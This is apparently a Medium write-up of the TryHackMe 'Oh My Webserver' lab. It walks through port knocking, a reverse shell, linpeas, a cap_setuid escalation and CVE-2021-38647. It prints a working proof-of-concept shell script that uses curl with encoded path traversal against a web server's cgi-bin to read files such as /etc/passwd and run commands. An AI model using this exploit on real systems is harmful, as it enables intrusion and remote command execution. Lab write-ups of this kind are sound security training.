Oh My Webserver — Writeup

LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb

My Target IP :

Let’s run a quick recon on the Target IP

nmap -p- — min-rate 1000

strange i am getting 80 port closed.

This thing i learned in a ctf. which is try to use the knock command to check if the port opens or not.

and it worked!

Running a detailed scan on the discovered port.

note the version of webserver

started a Dir Bruteforcing on the WebServer.

There is an error which might be exploitable but we don’t know for sure.

So let’s use the most powerful tool in CyberSec that is GOOGLE.

On googling for the exploit of the version of the web server running i found:


if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo ./PoC.sh targets.txt /etc/passwd
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

First copy this exploit and save as exploit.sh and then create a targets.txt file containing “http://<targetIP>”

Now that we have RCE. Let’s get a reverse shell.

What is the user flag?

To get root in docker container i downloaded linpeas and executed it

On reading the linpeas output I found something interesting in the capabilities.


cap_setuid can be exploited by

What is the root flag?

For further enumeration I executed linpeas again.

Didn’t find much in linpeas, except this IP so i thought of scanning it so for that i will have to get nmap on the box so let’s get nmap.

HOW to get nmap executable which u can tranfer and run.

now let’s run a python server here and tranfer to the shell.

let’s run this :

5986 port seems interesting, let’s google if there is a exploit for this.

unauthenticated RCE CVE-2021–38647


THERE YOU HAVE IT! Room is completed


LINK TREE: https://linktr.ee/RishabhRai



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store